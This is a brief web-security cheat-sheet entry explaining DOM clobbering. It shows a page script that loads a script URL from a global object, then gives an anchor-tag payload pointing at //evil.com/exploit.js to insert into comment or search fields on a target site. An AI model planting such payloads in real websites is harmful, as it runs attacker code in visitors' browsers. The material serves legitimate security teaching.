DOM Cloberring
Last modified: 2023-06-15
Basic Exploitation
If the website adds the JavaScript code into the DOM when loading page as below,
window.onload = function() {
let someObj = window.someObj || {};
let script = document.createElement('script');
script.src = someObj.url;
document.body.appendChild(script);
}
We may manipulate this someObj
and override the properties (url
here) using anchor
elements, then we can execute arbitrary JavaScript code.
For example, insert the following code in the comment, search, etc. in the target website.
<a id=someObj><a id=someObj name=url href=//evil.com/exploit.js>